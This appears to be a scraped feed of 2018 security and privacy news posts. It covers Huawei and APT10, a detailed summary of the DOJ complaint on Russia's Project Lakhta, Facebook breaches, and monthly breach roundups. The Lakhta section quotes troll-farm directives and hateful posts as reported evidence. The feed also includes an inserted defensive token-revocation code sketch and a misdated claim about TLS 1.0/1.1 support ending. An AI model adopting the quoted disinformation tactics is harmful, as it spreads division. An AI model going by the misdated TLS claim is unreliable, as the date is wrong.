There was an interesting article on Bloomberg, "How China Used a Tiny Chip to Infiltrate U.S. Companies". However, there was a counter-narrative to the Bloomberg article on Sky News. That didn't stop ex-Security Minister Admiral Lord West calling out the Chinese when he said Chinese IT kit 'is putting all of us at risk' if used in 5G. He raises a valid point, given the US Commerce Department said it would restrict the export of software and technology goods from American firms to Chinese chipmaker Fujian Jinhua. BT, which uses Huawei to supply parts for its network, told Sky News that it would "apply the same stringent security measures and controls to 5G when we start to roll it out, in line with continued guidance from government". Recently there have been warnings issued by the MoD and NCSC stating that a Chinese espionage group known as APT10 is attacking IT suppliers to target military and intelligence information.

NCSC is seeking feedback on the latest draft 'knowledge areas' of CyBOK, a cyber security body of knowledge which it is supporting along with academics and the wider security industry.

Google is finally pulling the plug on Google+, after user personal data was left exposed. Google and the other three major web browser providers in the world said, in what seem like coordinated announcements, that businesses must accept that TLS versions 1.0 and 1.1 will no longer be supported after Q1 2018.

So it's time to move over to the more secure TLS v1.2, or the more secure and efficient TLS v1.3.

Project Lakhta: Putin’s Chef spends $35M on social media influence

Project Lakhta is the name of a Russian project that was further documented by the Department of Justice last Friday in the form of a Criminal Complaint against Elena Alekseevna Khusyaynova, said to be the accountant in charge of running a massive organization designed to inject distrust and division into the American elections and American society in general.

https://www.justice.gov/opa/press-release/file/1102316/download

In a fairly unusual step, the 39 page Criminal Complaint against Khusyaynova, filed just last month in Alexandria, Virginia, has already been unsealed, prior to any indictment or specific criminal charges being brought against her before a grand jury.  US Attorney G. Zachary Terwilliger said "The strategic goal of this alleged conspiracy, which continues to this day, is to sow discord in the U.S. political system and to undermine faith in our democratic institutions."

The data shared below, intended to summarize the 39 page criminal complaint, contains many direct quotes from the document, which has been shared by the DOJ. (Click for full Criminal Complaint against Elena Khusyaynova)

The complaint shows that, since May 2014, the following organizations were used as cover to spread distrust towards candidates for political office and the political system in general:

Internet Research Agency LLC ("IRA")
Internet Research LLC
MediaSintez LLC
GlavSet LLC
MixInfo LLC
Azimut LLC
NovInfo LLC
Nevskiy News LLC ("NevNov")
Economy Today LLC
National News LLC
Federal News Agency LLC ("FAN")
International News Agency LLC ("MAN")

These entities employed hundreds of individuals in support of Project Lakhta's operations with an annual global budget of millions of US dollars.  Only some of their activity was directed at the United States.

Prigozhin and Concord

Concord Management and Consulting LLC and Concord Catering (collectively referred to as "Concord") are related Russian entities with various Russian government contracts.  Concord was the primary source of funding for Project Lakhta, controlling funding, recommending personnel, and overseeing activities through reporting and interaction with the management of various Project Lakhta entities.

Yevgeniy Viktorovich Prigozhin is a Russian oligarch closely identified with Russian President Vladimir Putin.  He began his career in the food and restaurant business and is sometimes referred to as "Putin's Chef."  Concord has Russian government contracts to feed school children and the military.

Prigozhin was previously indicted, along with twelve others and three Russian companies, for committing federal crimes while seeking to interfere with the US elections and political process, including the 2016 presidential election.

Project Lakhta internally referred to their work as "information warfare against the United States of America" which was conducted through fictitious US personas on social media platforms and other Internet-based media.

Lakhta has a management group which organized the project into departments, including a design and graphics department, an analysts department, a search-engine optimization ("SEO") department, an IT department and a finance department.

Khusyaynova has been the chief accountant of Project Lakhta's finance department since April of 2014, which included the budgets of most or all of the previously named organizations.  She submitted hundreds of financial vouchers, budgets, and payment requests for the Project Lakhta entities.  The money was managed through at least 14 bank accounts belonging to further Project Lakhta affiliates, including:

Glavnaya Liniya LLC
Merkuriy LLC
Obshchepit LLC
Potentsial LLC
RSP LLC
ASP LLC
MTTs LLC
Kompleksservis LLC
SPb Kulinariya LLC
Almira LLC
Pishchevik LLC
Galant LLC
Rayteks LLC
Standart LLC

Project Lakhta Spending

Monthly reports were provided by Khusyaynova to Concord about spending for at least the period from January 2016 through July 2018.

A document sent in January 2017 included the projected budget for February 2017 (60 million rubles, or roughly $1 million USD), and an accounting of spending for all of calendar 2016 (720 million rubles, or $12 million USD).  Expenses included:

Registration of domain names
Purchasing proxy servers
Social media marketing expenses, including:
 - purchasing posts for social networks
 - advertisements on Facebook
 - advertisements on VKontakte
 - advertisements on Instagram
 - promoting posts on social networks

Other expenses were for Activists, Bloggers, and people who "developed accounts" on Twitter to promote online videos.

In January 2018, the "annual report" for 2017 showed 733 million Russian rubles of expenditure ($12.2M USD).

More recent expenses, between January 2018 and June 2018, included more than $60,000 in Facebook ads, and $6,000 in Instagram ads, as well as $18,000 for Bloggers and Twitter account developers.

Project Lakhta Messaging

From December 2016 through May 2018, Lakhta analysts and activists spread messages "to inflame passions on a wide variety of topics" including:
  • immigration
  • gun control and the Second Amendment
  • the Confederate flag
  • race relations
  • LGBT issues
  • the Women's March
  • the NFL national anthem debate

Events in the United States were seized upon "to anchor their themes" including the Charleston church shootings, the Las Vegas concert shootings, the Charlottesville "Unite the Right" rally, police shootings of African-American men, and the personnel and policy decisions of the Trump administration.

Many of the graphics that were shared will be immediately recognizable to most social media users.

"Rachell Edison" Facebook profile
The graphic above was shared by a confirmed member of the conspiracy on December 5, 2016. "Rachell Edison" was a Facebook profile controlled by someone on payroll from Project Lakhta.  Their comment read "Whatever happens, blacks are innocent. Whatever happens, it's all guns and cops. Whatever happens, it's all racists and homophobes. Mainstream Media..."

The Rachell Edison account was created in September 2016 and controlled the Facebook page "Defend the 2nd".  Between December 2016 and May 2017, "while concealing its true identity, location, and purpose" this account was used to share over 700 inflammatory posts related to gun control and the Second Amendment.

Other accounts specialized in other themes.  Another account, using the name "Bertha Malone", was created in June 2015, using fake information to claim that the account holder lived in New York City and attended a university in NYC.  In January 2016, the account created a Facebook page called "Stop All Invaders" (StopAI) which shared over 400 hateful anti-immigration and anti-Islam memes, implying that all immigrants were either terrorists or criminals.  Posts shared by this account reached 1.3 million individuals and at least 130,851 people directly engaged with the content (for example, by liking, sharing, or commenting on materials that originated from this account).

Some examples of the hateful posts shared by "Bertha Malone" that were included in the DOJ criminal complaint included these:

The latter image was accompanied by the comment:

"Instead this stupid witch hunt on Trump, media should investigate this traitor and his plane to Islamize our country. If you are true enemy of America, take a good look at Barack Hussein Obama and Muslim government officials appointed by him."

Directions to Project Lakhta Team Members

The directions shared with the propaganda spreaders gave very specific examples of how to influence American thought, with guidance on what sources and techniques should be used to influence particular portions of our society.  For example, to further drive wedges in the Republican party, Republicans who spoke out against Trump were attacked on social media (all of these quotes are marked in the Criminal Complaint as "preliminary translations of Russian text"):

"Brand McCain as an old geezer who has lost it and who long ago belonged in a home for the elderly. Emphasize that John McCain's pathological hatred towards Donald Trump and towards all his initiatives crosses all reasonable borders and limits.  State that dishonorable scoundrels, such as McCain, immediately aim to destroy all the conservative voters' hopes as soon as Trump tries to fulfill his election promises and tries to protect the American interests."

"Brand Paul Ryan a complete and absolute nobody incapable of any decisiveness.  Emphasize that while serving as Speaker, this two-faced loudmouth has not accomplished anything good for America or for American citizens.  State that the only way to get rid of Ryan from Congress, provided he wins in the 2018 primaries, is to vote in favor of Randy Brice, an American veteran and an iron worker and a Democrat."

Frequently the guidance was in relation to a particular news headline, where directions on how to use the headline to spread their message of division were shared. A couple of examples of these:

After a news story "Trump: No Welfare To Migrants for Grants for First 5 Years" was shared, the conspiracy was directed to twist the messaging like this:

"Fully support Donald Trump and express the hope that this time around Congress will be forced to act as the president says it should. Emphasize that if Congress continues to act like the Colonial British government did before the War of Independence, this will call for another revolution.  Summarize that Trump once again proved that he stands for protecting the interests of the United States of America."

In response to an article about scandals in the Robert Mueller investigation, the direction was to use this messaging:

"Special prosecutor Mueller is a puppet of the establishment. List scandals that took place when Mueller headed the FBI.  Direct attention to the listed examples. State the following: It is a fact that the Special Prosector who leads the investigation against Trump represents the establishment: a politician with proven connections to the U.S. Democratic Party who says things that should either remove him from his position or disband the entire investigation commission. Summarize with a statement that Mueller is a very dependent and highly politicized figure; therefore, there will be no honest and open results from his investigation. Emphasize that the work of this commission is damaging to the country and is aimed to declare impeachement of Trump. Emphasize that it cannot be allowed, no matter what."

Many more examples are given, some targeted at particular concepts, such as this direction regarding "Sanctuary Cities":

"Characterize the position of the Californian sanctuary cities along with the position of the entire California administration as absolutely and completely treacherous and disgusting. Stress that protecting an illegal rapist who raped an American child is the peak of wickedness and hypocrisy. Summarize in a statement that "sanctuary city" politicians should surrender their American citizenship, for they behave as true enemies of the United States of America"

Some more basic guidance shared by Project Lakhta was about how to target conservatives vs. liberals, such as "if you write posts in a liberal group, you must not use Breitbart titles.  On the contrary, if you write posts in a conservative group, do not use Washington Post or BuzzFeed's titles."

We see the "headline theft" implied by this in some of their memes.  For example, this Breitbart headline:


Became this Project Lakhta meme (shared by Stop All Immigrants):


Similarly, this meme, originally shared as a quote from the Heritage Foundation, was adopted and rebranded by Lakhta-funded "Stop All Immigrants":



Twitter Messaging and Specific Political Races

Many Twitter accounts shown to be controlled by paid members of the conspiracy were making very specific posts in support of or in opposition to particular candidates for Congress or Senate.  Some examples listed in the Criminal Complaint include:

@CovfefeNationUS posting:

Tell us who you want to defeat!  Donate $1.00 to defeat @daveloebsack Donate $2.00 to defeat @SenatorBaldwin Donate $3.00 to defeat @clairecmc Donate $4.00 to defeat @NancyPelosi Donate $5.00 to defeat @RepMaxineWaters Donate $6.00 to defeat @SenWarren

Several of the Project Lakhta Twitter accounts got involved in the Alabama Senate race, but, underlining that the objective of Lakhta is to CREATE DISSENT AND DISTRUST, they actually tweeted on opposite sides of the campaign:

One Project Lakhta Twitter account, @KaniJJackson, posted on December 12, 2017: 

"Dear Alabama, You have a choice today. Doug Jones put the KKK in prison for murdering 4 young black girls.  Roy Moore wants to sleep with your teenage daughters. This isn't hard. #AlabamaSenate"

while on the same day @JohnCopper16, also a confirmed Project Lakhta Twitter account, tweeted:

"People living in Alabama have different values than people living in NYC. They will vote for someone who represents them, for someone who they can trust. Not you.  Dear Alabama, vote for Roy Moore."

@KaniJJackson was a very active voice for Lakhta.  Here are some additional tweets for that account:

"If Trump fires Robert Mueller, we have to take to the streets in protest.  Our democracy is at stake." (December 16, 2017)

"Who ended DACA? Who put off funding CHIP for 4 months? Who rejected a deal to restore DACA? It's not #SchumerShutdown. It's #GOPShutdown." (January 19, 2018)

@JohnCopper16 also tweeted on that topic: 
"Anyone who believes that President Trump is responsible for #shutdown2018 is either an outright liar or horribly ignorant. #SchumerShutdown for illegals. #DemocratShutdown #DemocratLosers #DemocratsDefundMilitary #AlternativeFacts"   (January 20, 2018)

@KaniJJackson on Parkland, Florida and the 2018 Midterm election: 
"Reminder: the same GOP that is offering thoughts and prayers today are the same ones that voted to allow loosening gun laws for the mentally ill last February.  If you're outraged today, VOTE THEM OUT IN 2018. #guncontrol #Parkland"

They even tweet about themselves, as shown in this pair of tweets!

@JemiSHaaaZzz (February 16, 2018):
"Dear @realDonaldTrump: The DOJ indicted 13 Russian nationals at the Internet Research Agency for violating federal criminal law to help your campaign and hurt other campaigns. Still think this Russia thing is a hoax and a witch hunt? Because a lot of witches just got indicted."

@JohnCopper16 (February 16, 2018): 
"Russians indicted today: 13  Illegal immigrants crossing Mexican border indicted today: 0  Anyway, I hope all those Internet Research Agency f*ckers will be sent to gitmo." 

The Russians are also involved in "getting out the vote" - especially of those who hold strongly divisive views:

@JohnCopper16 (February 27, 2018):
"Dem2018 platform - We want women raped by the jihadists - We want children killed - We want higher gas prices - We want more illegal aliens - We want more Mexican drugs And they are wondering why @realDonaldTrump became the President"

@KaniJJackson (February 19, 2018): 
"Midterms are 261 days, use this time to: - Promote your candidate on social media - Volunteer for a campaign - Donate to a campaign - Register to vote - Help others register to vote - Spread the word We have only 261 days to guarantee survival of democracy. Get to work!"

More recent tweets have been on a wide variety of topics, with other accounts expressing strong views around racial tensions, and then speaking to the Midterm elections: 

@wokeluisa (another confirmed Project Lakhta account): 
"Just a reminder that: - Majority black Flint, Michigan still has drinking water that will give you brain damage if consumed - Republicans are still trying to keep black people from voting - A terrorist has been targeting black families for assassination in Austin, Texas" 

and then, also @wokeluisa: (March 19, 2018): 
"Make sure to pre-register to vote if you are 16 y.o. or older. Don't just sit back, do something about everything that's going on because November 6, 2018 is the date that 33 senate seats, 436 seats in the House of Representatives and 36 governorships will be up for re-election." 

And from @johncopper16 (March 22, 2018):
"Just a friendly reminder to get involved in the 2018 Midterms. They are motivated They hate you They hate your morals They hate your 1A and 2A rights They hate the Police They hate the Military They hate YOUR President" 

Some of the many additional Twitter accounts controlled by the conspiracy mentioned in the Criminal Complaint: 

@UsaUsafortrump, @USAForDTrump, @TrumpWithUSA, @TrumpMov, @POTUSADJT, @imdeplorable201, @swampdrainer659, @maga2017trump, @TXCowboysRawk, @covfefeNationUS, @wokeluisa (2,000 tweets and at least 55,000 followers), @JohnCopper16, @Amconvoice, @TheTrainGuy13, @KaniJJackson, @JemiSHaaaZzz 




Facebook’s confusion about its Portal camera is concerning

Facebook couldn't have picked a worse time to introduce Portal, a camera-equipped smart display designed to make video chatting in your home easier. And, if the rumors are true, the company is reportedly also preparing to launch a video chat camera for your TV, based on the same system as Portal. News of this hardware comes at a time when Facebook is under major scrutiny after suffering a massive data breach in September, which exposed private information of 29 million users, including usernames, birth date, gender, location, religion and the devices used to browse the site. But the most concerning part about Portal is that Facebook's own executives don't seem to have a basic understanding of what types of data the company will be collecting or what it will be using it for.

WSJ: Facebook believes spammers were behind its massive data breach

More than two weeks after Facebook revealed a massive data breach, we still don't know who was using the flaw in its site to access information on tens of millions of users. Now the Wall Street Journal reports, based on anonymous sources, that the company believes spammers perpetrated the hack in an attempt to make money via deceptive advertising.

Source: Wall Street Journal

Cyber Security Roundup for September 2018

September 2018 started with a data breach bang, with British Airways disclosing a significant hack and data loss: 380,000 of the airline's website and mobile app customers had their debit and credit card details lifted via a maliciously injected script.  The breach even caused BA's owner, IAG, to drop 4% in value. To compound matters, several claims were made that the BA website wasn't PCI DSS compliant, implying that if it had been, its customers' personal and payment card information would still be safe.  For further details about this breach see my blog posts: British Airways Customer Data Stolen in Website and Mobile App Hack and British Airways Hack Update: Caused by Injected Script & PCI DSS Non-Compliance is Suspected.

Facebook continues to make all the wrong kind of privacy headlines after a massive user data breach was confirmed by the social media giant at the end of the month. Facebook said at least 50 million users’ data was at risk after hackers exploited a vulnerability in the Facebook code. Facebook CEO Mark Zuckerberg said he doesn’t know who is behind the cyber attack; however, the FBI are investigating. 

There was a good measure of embarrassment at the Tory Conference after a flaw in the conference app revealed the personal data of senior UK government cabinet ministers, with Boris Johnson, Michael Gove and Gavin Williamson among those whose personal information and phone numbers were made available.

There were a number of large data breach fines handed out in September. Tesco Bank was hit by a whopping £16.4 million fine by the Financial Conduct Authority (FCA); the fine would have been doubled if it weren't for Tesco's good co-operation with the FCA investigation. The FCA said Tesco had security deficiencies which left its bank account holders vulnerable to a cyber attack in November 2016. The attack netted the bad guys, via 34 transactions, a cool £2.26 million. The FCA report said the cyber criminals had exploited weaknesses in the bank's design of its debit card, its financial crime controls and its financial crime operations team to carry out the attack over a 48-hour period. 

Equifax was fined the maximum pre-GDPR law amount of £500K by the Information Commissioner's Office (ICO) after the US-based credit reference agency failed to protect the personal data of 15 million UK citizens. The ICO ruled Equifax's UK branch had "failed to take appropriate steps" to protect UK citizens' data. It added that "multiple failures" meant personal information had been kept longer than necessary and left vulnerable.

The ICO also fined Bupa £175K for not having good enough security to prevent the theft of 547,000 customer records by an employee.  Uber has paid £133m to settle legal claims by customers and drivers, as a result of trying to cover up from its regulators a huge breach which occurred in 2016. The ride-hailing company admitted to paying off hackers to the tune of $100,000 to delete the data they stole from Uber's cloud servers. The personal data stolen was from 57 million Uber accounts and also included 600,000 driving licence numbers. 

It looks like the MoD and GCHQ are looking to beef up Britain's cyber offence capabilities, announcing a plan to recruit a 2,000-strong 'cyber force' to take on the Russian threat. Meanwhile, across the pond, the Mirai creators have done a deal to keep themselves out of jail in return for helping the FBI catch cybercrooks, which has echoes of the approach the FBI took with con artist and cheque fraud expert Frank Abagnale, the subject of the book and movie "Catch Me If You Can".

Bristol Airport was impacted by a ransomware attack, which took down its arrival and departure screens for a couple of days, and a Scottish brewery was also hit by a ransomware attack through an infected CV it had received via an online job advertisement.

Europol warned of 15 ways you could become a cyber crime victim, and there was an excellent article in the New York Times on the Bangladesh Central Bank cyber theft.


Facebook Announces Security Flaw Found in “View As” Feature

Another day, another Facebook story. In May, a Facebook Messenger malware named FacexWorm was utilized by cybercriminals to steal user passwords and mine for cryptocurrency. Later that same month, the personal data of 3 million users was exposed by an app on the platform dubbed myPersonality. And in June, millions of the social network’s users may have unwittingly shared private posts publicly due to another new bug. Which brings us to today. Just announced this morning, Facebook revealed they are dealing with yet another security breach, this time involving the “View As” feature.

Facebook users have the ability to view their profiles from another user’s perspective, which is called “View As.” This very feature was found to have a security flaw that has impacted approximately 50 million user accounts, as cybercriminals have exploited this vulnerability to steal Facebook users’ access tokens. Access tokens are digital keys that keep users logged in, and they permit users to bypass the need to enter a password every time. Essentially, this flaw helps cybercriminals take over users’ accounts.

While the access tokens of 50 million accounts were taken, Facebook still doesn’t know if any personal information was gathered or misused from the affected accounts. However, they do suspect that everyone who used the “View As” feature in the last year will have to log back into Facebook, as well as any apps that used a Facebook login. An estimated 90 million Facebook users will have to log back in.
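The response the post describes, forcing affected accounts (and the apps they signed into with Facebook Login) to log back in, amounts to invalidating those accounts' access tokens. The sketch below is an added example, not McAfee's or Facebook's code; it assumes an opaque server-side token store and a constructed log of "View As" uses, neither of which the post describes.

```python
"""Incident response sketch: retire access tokens for accounts touched by a token-leak bug."""
from __future__ import annotations

import secrets
from dataclasses import dataclass

DAY = 86_400  # seconds


@dataclass
class TokenRecord:
    user_id: str
    app_id: str     # "web" for a first-party session, otherwise the app that used Facebook Login
    issued_at: int  # Unix seconds


def accounts_to_reset(view_as_log, now: int, window: int = 365 * DAY) -> set[str]:
    """Accounts that used the affected feature inside the look-back window (one year in the post).

    view_as_log is a constructed list of (user_id, timestamp) events; the real audit
    source is an assumption of this example."""
    return {user_id for user_id, ts in view_as_log if now - ts <= window}


class TokenStore:
    """Opaque server-side access tokens with per-user revocation by issue time."""

    def __init__(self) -> None:
        self._tokens: dict[str, TokenRecord] = {}
        self._reset_at: dict[str, int] = {}        # user_id -> tokens issued before this are dead
        self.rejected: list[tuple[str, str]] = []  # (user_id, app_id) of revoked tokens presented

    def issue(self, user_id: str, app_id: str, now: int) -> str:
        # The string is an unguessable handle; all meaning lives in the server-side record,
        # so revocation never depends on getting the token back from the client.
        token = secrets.token_urlsafe(32)
        self._tokens[token] = TokenRecord(user_id, app_id, now)
        return token

    def reset_users(self, user_ids, now: int) -> int:
        """Invalidate every token (web session and third-party app) issued to these users before now."""
        ids = set(user_ids)
        for user_id in ids:
            self._reset_at[user_id] = now
        return len(ids)

    def validate(self, token: str) -> TokenRecord | None:
        rec = self._tokens.get(token)
        if rec is None:
            return None
        if rec.issued_at < self._reset_at.get(rec.user_id, 0):
            # A revoked token still being presented is what a stolen token looks like once
            # its owner has been forced to log back in, so it is recorded for review.
            self.rejected.append((rec.user_id, rec.app_id))
            return None
        return rec


if __name__ == "__main__":
    # Constructed timeline: three accounts, two of which used the feature within a year.
    now = 1_538_000_000
    log = [("alice", now - 10 * DAY), ("bob", now - 400 * DAY), ("carol", now - 300 * DAY)]
    store = TokenStore()
    web = store.issue("alice", "web", now - 5 * DAY)
    app = store.issue("alice", "partner-app", now - 2 * DAY)
    store.reset_users(accounts_to_reset(log, now), now)
    print("alice web session still valid:", store.validate(web) is not None)   # False
    print("alice partner-app token valid:", store.validate(app) is not None)   # False
    print("flagged presentations of revoked tokens:", store.rejected)
```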

As of now, this story is still developing, as Facebook is still investigating further into this issue. Now, the question is — if you’re an impacted Facebook user, what should you do to stay secure? Start by following these tips:

  • Change your account login information. Since this flaw logged users out, it’s vital you change up your login information. Be sure to make your next password strong and complex, so it will be difficult for cybercriminals to crack. It also might be a good idea to turn on two-factor authentication.
  • Update, update, update. No matter the application, it can’t be stressed enough how important it is to always update an app as soon as an update is available, as fixes are usually included with each version. Facebook has already issued a fix to this vulnerability, so make sure you update immediately.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Facebook Announces Security Flaw Found in “View As” Feature appeared first on McAfee Blogs.

Plaintiffs File Class Action Lawsuit Against Nielsen Over Alleged False and Misleading Statements

On August 28, 2018, plaintiffs filed a class action lawsuit against Nielsen Holdings PLC (“Nielsen”) and some of its officers and directors for making allegedly materially false and misleading statements to investors about the impact of privacy regulations and third-party business partners’ privacy policies on the company’s revenues and earnings. The case was filed in the United States District Court for the Southern District of New York. 

The complaint alleges that Nielsen made false and/or misleading statements and/or failed to disclose that: (1) Nielsen recklessly disregarded its readiness for and the true risks of privacy-related regulations and policies, including the EU General Data Protection Regulation (“GDPR”), on its current and future financial and growth prospects; (2) Nielsen’s financial performance was far more dependent on Facebook and other third-party large data set providers than previously disclosed, and privacy policy changes affected the scope and terms of access Nielsen would have had to third-party data; and (3) access to Facebook and other third-party provider data was becoming increasingly restricted for Nielsen and Nielsen clients. Plaintiffs allege that, as a result, Nielsen’s public statements were materially false and misleading at all relevant times.

The complaint maintains that, because of Nielsen’s “material misrepresentations and omissions, Nielsen stock traded at artificially inflated prices.” The complaint further alleges that when Nielsen published its financial results for the second quarter of 2018 announcing that it missed revenue and earnings targets, its stock plummeted, which caused substantial harm to the plaintiffs who were investors in Nielsen stock. In that announcement, Nielsen cited the impact of the GDPR on the company’s results and announced that its CEO and Executive Chairman, Mitch Barns, would retire from the company at the end of 2018.

Read the complaint.

Cyber Security Roundup for July 2018

The importance of assuring the security and testing quality of third-party provided applications is more than evident when you consider an NHS-reported data breach of 150,000 patient records this month. The NHS said the breach was caused by a coding error in a GP application called SystmOne, developed by UK-based 'The Phoenix Partnership' (TTP). The same assurance also applies to internally developed applications; a case in point was a publicly announced flaw in Thomas Cook's booking system discovered by a Norwegian security researcher. The researcher used the app flaw to access the names and flight details of Thomas Cook passengers and released the details on his blog. Thomas Cook said the issue has since been fixed.

Third-party services also need to be security assured, as seen with the Typeform compromise. Typeform is a data collection company; on 27th June, hackers gained unauthorised access to one of its servers and accessed customer data. According to its official notification, Typeform said the hackers may have accessed the data held on a partial backup, and that it had fixed a security vulnerability to prevent a recurrence. Typeform has not provided any details of the number of records compromised, but one of its customers, Monzo, said on its official blog that it was in the region of 20,000. Interestingly, Monzo also declared it would end its relationship with Typeform unless it wins their trust back. Travelodge is one UK company known to be impacted by the Typeform breach and has warned its impacted customers. Typeform is used to manage Travelodge’s customer surveys and competitions.

Other companies known to be impacted by the Typeform breach include:

The Information Commissioner's Office (ICO) fined Facebook £500,000, the maximum possible, over the Cambridge Analytica data breach scandal, which impacted some 87 million Facebook users. Fortunately for Facebook, the breach occurred before the General Data Protection Regulation came into force in May, as the new GDPR empowers the ICO with much tougher financial penalties designed to bring tech giants to book; let's be honest, £500k is petty cash for the social media giant.

A UK government report criticised the security of Huawei products, concluding the government had "only limited assurance" that Huawei kit posed no threat to UK national security. I remember being concerned many years ago when I heard BT had ditched US Cisco routers for Huawei routers to save money; not much was said about the national security aspect at the time. The UK gov report was written by the Huawei Cyber Security Evaluation Centre (HCSEC), which was set up in 2010 in response to concerns about BT's and other UK companies' reliance on the Chinese manufacturer's devices; by the way, that body is overseen by GCHQ.

Banking hacking group "MoneyTaker" has struck again, this time stealing a reported £700,000 from a Russian bank, according to Group-IB. The group is thought to be behind several other hacking raids against UK, US and Russian companies. The gang compromised a router which gave them access to the bank's internal network; from that entry point, they were able to find the specific system used to authorise cash transfers and then set up the bogus transfers to cash out £700K.



Cyber Security Roundup for April 2018

The fallout from the Facebook privacy scandal rumbled on throughout April and culminated with the closure of the company at the centre of the scandal, Cambridge Analytica.
Ikea was forced to shut down its freelance labour marketplace app and website 'TaskRabbit' following a 'security incident'. Ikea advised users of TaskRabbit to change their credentials if they had used them on other sites, suggesting a significant database compromise.

TSB bosses came under fire after a botched upgrade to their online banking system, which meant the Spanish-owned bank had to shut down its online banking facility, preventing usage by over 5 million TSB customers. Cybercriminals were quick to take advantage of TSB's woes.

Great Western Railway reset the passwords of more than a million customer accounts following a breach by hackers, US SunTrust reported an ex-employee stole 1.5 million bank client records, an NHS website was defaced by hackers, and US retailers Saks and Lord & Taylor had 5 million payment cards stolen after a staff member was successfully phished by a hacker.

The UK National Cyber Security Centre (NCSC) blacklisted China's state-owned firm ZTE, warning UK telecom providers that usage of ZTE's equipment could pose a national security risk. Interestingly, BT formed a research and development partnership with ZTE in 2011 and had distributed ZTE modems. The NCSC, along with the United States government, released statements accusing Russia of large-scale cyber-campaigns aimed at compromising vast numbers of Western-based network devices.

IBM released the 2018 X-Force Report, a comprehensive report which stated, for the second year in a row, that the financial services sector was the most targeted by cybercriminals, typically by sophisticated malware such as Zeus, TrickBot and Gootkit. NTT Security released its 2018 Global Threat Intelligence Report, which unsurprisingly confirmed that ransomware attacks had increased 350% last year.  

A concerning report by the EEF said UK manufacturers' IT systems are often outdated and highly vulnerable to cyber threats, with nearly half of all UK manufacturers having already been the victim of cybercrime. An Electropages blog questioned whether the boom in public cloud service adoption opens the door to cybercriminals.

Finally, it was yet another frantic month of security updates, with critical patches released by Microsoft, Adobe, Apple, Intel, Juniper, Cisco, and Drupal.


Weekly Cyber Risk Roundup: Orbitz Breach, Facebook Privacy Fallout

One of the biggest data breach announcements of the past week belonged to Orbitz, which said on Tuesday that as many as 880,000 customers may have had their payment card and other personal information compromised due to unauthorized access to a legacy Orbitz travel booking platform.

“Orbitz determined on March 1, 2018 that there was evidence suggesting that, between October 1, 2017 and December 22, 2017, an attacker may have accessed certain personal information, stored on this consumer and business partner platform, that was submitted for certain purchases made between January 1, 2016 and June 22, 2016 (for Orbitz platform customers) and between January 1, 2016 and December 22, 2017 (for certain partners’ customers),” the company said in a statement.

Information potentially compromised includes payment card information, names, dates of birth, addresses, phone numbers, email addresses, and gender.

As American Express noted in its statement about the breach, the affected Orbitz platform served as the underlying booking engine for many online travel websites, including Amextravel.com and travel booked through Amex Travel Representatives.

Expedia, which purchased Orbitz in 2015, did not say how many or which partner platforms were affected by the breach, USA Today reported. However, the company did say that the current Orbitz.com site was not affected.


Other trending cybercrime events from the week include:

  • State data breach notifications: Island Outdoor is notifying customers that payment card information may have been stolen due to the discovery of malware affecting several of its websites. Agemni is notifying customers about unauthorized charges after “a single authorized user of our software system used customer information to make improper charges for his personal benefit.” The Columbia Falls School District is notifying parents of a cyber-extortion threat involving their children’s personal information. Intuit is notifying TurboTax customers that their accounts may have been accessed by an actor leveraging previously leaked credentials. Taylor-Dunn Manufacturing Company is notifying customers that it discovered cryptocurrency mining malware on a server and that a file containing personal information of those registered for the Taylor-Dunn customer care or dealer center may have been accessed. Nampa School District is notifying a “limited number” of employees and Skamania Public Utility District is notifying customers that their personal information may have been compromised due to incidents involving unauthorized access to an employee email account.
  • Data exposed: A flaw in Telstra Health’s Argus software, which is used by more than 40,000 Australian health specialists, may have exposed the medical information of patients to hackers. Primary Healthcare is notifying patients of unauthorized access to four employee email accounts. More than 300,000 Pennsylvania school teachers may have had their personal information publicly released due to an employee error involving the Teacher Management Information System.
  • Notable ransomware attacks: The city of Atlanta said a ransomware attack disrupted internal and customer-facing applications, which made it difficult for citizens to pay bills and access court-related information. Atrium Hospitality is notifying 376 hotel guests that their personal information may have been compromised due to a ransomware infection at a workstation at the Holiday Inn Sacramento. Finger Lakes Health said it lost access to its computer system due to ransomware infection.
  • Other notable events: Frost Bank said that malicious actors compromised a third-party lockbox software program and were able to access images of checks that were stored in the database. National Lottery users are being advised to change their passwords after 150 accounts were affected by a “low-level” hack. A lawsuit against Internet provider CenturyLink and AT&T-owned DirecTV alleges that customer data was available through basic Internet searches.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week

Facebook has faced a week of criticism, legal actions, and outcry from privacy advocates after it was revealed that the political consulting firm Cambridge Analytica had accessed the information of 50 million users and leveraged that information while working with the Donald Trump campaign in 2016.

“Cambridge Analytica obtained the data from a professor at the University of Cambridge who had collected the information by creating a personality-quiz app in 2013 that plugged into Facebook’s platform,” The Wall Street Journal reported. “Before a policy change in 2015, Facebook gave app creators and academics access to a treasure trove of data, ranging from which pages users liked to details about their friends.”

It isn’t clear how many other developers might have retained information harvested from Facebook before the 2015 policy change, The Journal reported. However, Mark Zuckerberg said the company may spend “many millions of dollars” auditing tens of thousands of data collecting apps in order to get a better handle on the situation.

The privacy breach has already led to regulatory scrutiny and potential lawsuits around the globe. Bloomberg reported that the FTC is probing whether data handling violated terms of a 2011 consent decree. In addition, Facebook said it would conduct staff-level briefings with six congressional committees in the coming week. Some lawmakers have called for Zuckerberg to testify as well, and Zuckerberg told media outlets that he would be willing to do so if asked.

Facebook’s stock price has dropped from $185 to $159 over the past eight days amid the controversy, and several companies have suspended their advertising on Facebook or deleted their Facebook pages altogether due to the public backlash.

Facebook Publishes Privacy Principles and Announces Introduction of Privacy Center

On January 28, 2018, Facebook published its privacy principles and announced that it will centralize its privacy settings in a single place. The principles were announced in a newsroom post by Facebook’s Chief Privacy Officer and include:

  • “We give you control of your privacy.”
  • “We help people understand how their data is used.”
  • “We design privacy into our products from the outset.”
  • “We work hard to keep your information secure.”
  • “You own and can delete your information.”
  • “Improvement is constant.”
  • “We are accountable.”

In conjunction with the publication of the privacy principles, Facebook also announced the creation of a new privacy center and an educational video campaign for its users that focuses on advertising, reviewing and deleting old posts, and deleting accounts. The videos will appear in users’ news feeds and will be refreshed throughout the year.

The CNIL Serves Formal Notice to WhatsApp Regarding Sharing Data with Facebook

